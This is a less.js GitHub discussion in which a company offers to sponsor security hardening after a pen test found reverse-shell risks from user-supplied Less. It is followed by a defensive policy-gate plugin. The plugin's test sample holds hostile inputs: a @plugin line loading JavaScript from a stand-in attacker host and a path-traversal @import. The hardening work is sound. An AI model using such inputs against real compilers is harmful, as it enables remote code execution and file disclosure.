We'd like to sponsor less.js! #3663
Replies: 3 comments
-
Hi @matthew-gill. Unfortunately, I work full time and don't have extra time to devote to Less. If I had extra time, I would probably be investing it in other projects. But maybe someone else could see this and you could contract with them. I feel like the options you mention are a bit verbose and I'm not sure of the utility of something like |
-
@matthew-gill Agree with
|
-
Note that |
-
Hello @matthew-dean !
We use the less.js plugin in our platform to allow users to write less to customise pages which get displayed on our client's sites.
Our company, Mention Me (https://mention-me.com), would love to be able to contribute back to the less community, so I'd like to open up a conversation to see if you or your team would be willing to take on some sponsored work if we would be willing to pay for it.
There are some security concerns which have been flagged by our annual penetration test relating to our use of this library. As we allow user input to go through the less compiler, there are lots of things we need to be careful with.
We have some code snippets which our pen test found which can result in a reverse shell being opened, so in the interest of security, I'll leave them out of this issue - feel free to contact me directly and I can share them with you (matt.gill@mention-me.com)
Some ideas which would be great to introduce via the lessc flags might be the following
```
--disable-at-rules-all                # (Disable ALL at rules)
--disable-at-rules-import             # (Disable all @import)
--disable-at-rules-plugin             # (Disable all @plugin)
--enabled-at-rules=media,supports
...
--remote-file-approved-domains=https://foo.com,https://bar.com
--remote-file-enforce-https
```
Would this be something you'd be willing to have a conversation with us about? Ideally we'd be able to contribute these directly by raising a PR, but we'd like to get the owner of the module who knows the code best to introduce the changes.
cc @edhgoose
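The flags proposed in the post amount to a source-level policy: reject `@plugin` outright, allow `@import` only to an approved list of HTTPS origins, and allow-list every other at-rule. The block below is an added example of that policy, written for this page; it is not code from less.js or from Mention Me. It scans the raw Less text for at-rules at statement start, skipping comments, quoted strings and `url(...)` so an `@import` hidden inside one is not counted, and wraps the check in a plugin in the pre-processor shape less.js documents (`pluginManager.addPreProcessor`), which is the hook that runs before the parser resolves `@import` and `@plugin`. The policy names, the plugin wiring, the approved origins `https://foo.com` and `https://bar.com` (taken from the proposal) and the sample stylesheet are assumptions.

```javascript
// Added example (not less.js code): a text-level policy gate for user-supplied Less.
// The policy shape mirrors the flags proposed above; names and defaults are assumptions.
const DEFAULT_POLICY = {
  // --enabled-at-rules=...: everything not listed is rejected (fail closed)
  allowedAtRules: new Set(['media', 'supports', 'font-face', 'keyframes', 'charset']),
  // --remote-file-approved-domains=...: an empty list disables @import entirely
  allowedImportOrigins: ['https://foo.com', 'https://bar.com'],
  // --remote-file-enforce-https
  enforceHttps: true,
};

const STATEMENT_START = new Set(['', ';', '{', '}']);

// Find at-rules at statement start, ignoring comments, quoted strings and url(...),
// so that an "@import" hidden in any of those is not counted. Less variable
// declarations (@x: ...) are skipped. Returns [{ name, prelude, offset }].
function findAtRules(src) {
  const found = [];
  const n = src.length;
  let i = 0;
  let prev = ''; // last significant (non-comment, non-whitespace) character seen
  while (i < n) {
    const c = src[i];
    if (c === '/' && src[i + 1] === '*') {                 // block comment
      const end = src.indexOf('*/', i + 2);
      i = end === -1 ? n : end + 2;
    } else if (c === '/' && src[i + 1] === '/') {          // Less line comment
      const end = src.indexOf('\n', i);
      i = end === -1 ? n : end;
    } else if (c === '"' || c === "'") {                   // quoted string, honouring escapes
      let j = i + 1;
      while (j < n && src[j] !== c) j += src[j] === '\\' ? 2 : 1;
      i = j + 1;
      prev = c;
    } else if (src.startsWith('url(', i)) {                // unquoted url() may contain "//"
      const end = src.indexOf(')', i);
      i = end === -1 ? n : end + 1;
      prev = ')';
    } else if (c === '@' && /[a-zA-Z-]/.test(src[i + 1] || '') && STATEMENT_START.has(prev)) {
      const name = /^[a-zA-Z-]+/.exec(src.slice(i + 1))[0];
      let j = i + 1 + name.length;
      while (j < n && /\s/.test(src[j])) j++;
      if (src[j] === ':') {                                // "@var: value;" is a variable, not an at-rule
        i = j + 1;
        prev = ':';
        continue;
      }
      let k = j;                                            // prelude runs up to ';' or '{'
      while (k < n && src[k] !== ';' && src[k] !== '{') k++;
      found.push({ name: name.toLowerCase(), prelude: src.slice(j, k).trim(), offset: i });
      i = k;                                                // main loop consumes the ';' / '{'
    } else {
      if (!/\s/.test(c)) prev = c;
      i++;
    }
  }
  return found;
}

// Validate one @import target against the origin policy. Returns null or a reason string.
function checkImportTarget(prelude, policy) {
  if (policy.allowedImportOrigins.length === 0) return '@import is disabled';
  // target is a quoted string or url(...), possibly after options such as (reference)
  const m = /(?:url\(\s*["']?|["'])([^"')]+)/.exec(prelude);
  if (!m) return `@import target not recognised: ${prelude}`;
  const target = m[1].trim();
  let url;
  try {
    url = new URL(target);                                  // throws for relative/local paths
  } catch (e) {
    return `relative or local @import not allowed: ${target}`;
  }
  if (policy.enforceHttps && url.protocol !== 'https:') return `non-https @import: ${target}`;
  // exact-origin match: URL normalises the origin, so foo.com.evil.com and user@host tricks fail
  if (!policy.allowedImportOrigins.includes(url.origin)) return `@import origin not approved: ${url.origin}`;
  return null;
}

// Run the whole policy over one Less source. Returns a list of violations (empty = allowed).
function checkSource(src, policy = DEFAULT_POLICY) {
  const violations = [];
  for (const rule of findAtRules(src)) {
    let reason = null;
    if (rule.name === 'plugin') {
      reason = '@plugin is disabled';                       // loads arbitrary JS: never allowed
    } else if (rule.name === 'import') {
      reason = checkImportTarget(rule.prelude, policy);
    } else if (!policy.allowedAtRules.has(rule.name)) {
      reason = `@${rule.name} is not in the at-rule allow-list`;
    }
    if (reason) violations.push(`${reason} (offset ${rule.offset})`);
  }
  return violations;
}

// Plugin in the pre-processor shape documented for less.js 3.x (assumed API, not exercised here):
//   less.render(src, { plugins: [lessPolicyPlugin], javascriptEnabled: false })
// A pre-processor sees the raw text before the parser resolves @import/@plugin, so
// rejected input never reaches a file manager or the plugin loader.
const lessPolicyPlugin = {
  install(less, pluginManager) {
    pluginManager.addPreProcessor({
      process(src) {
        const violations = checkSource(src);
        if (violations.length) throw new Error(`Less policy violation: ${violations.join('; ')}`);
        return src;
      },
    }, 1000); // high priority so it runs before any other pre-processor
  },
  minVersion: [3, 0, 0],
};

// Constructed sample of tenant-submitted Less; not taken from any real site.
const SAMPLE_USER_LESS = `
// tenant stylesheet
@brand: #c00;
@import (reference) "https://foo.com/theme/base.less"; // approved origin, https
@media (max-width: 600px) { .hero { color: @brand; } }
/* @plugin "commented-out.js"; is ignored */
.x { background: url(https://cdn.example/i.png); content: "@import 'in-a-string';"; }
@plugin "https://attacker.example/evil.js";
@import "http://foo.com/insecure.less";
@import "../../etc/hostname";
`;

for (const v of checkSource(SAMPLE_USER_LESS)) console.log('REJECT:', v);
```

Keep `javascriptEnabled` at its default of `false` alongside this gate, since inline backtick JavaScript is a separate path to code execution, and run the compiler itself with no network and no filesystem access beyond a scratch directory; the scanner is a gate in front of that sandbox, not a replacement for it. It fails closed on anything it does not recognise, so a detached-ruleset call such as `@detached();` at statement start is rejected too, and its prelude handling is approximate (a `;` inside a quoted `@import` target ends the prelude early).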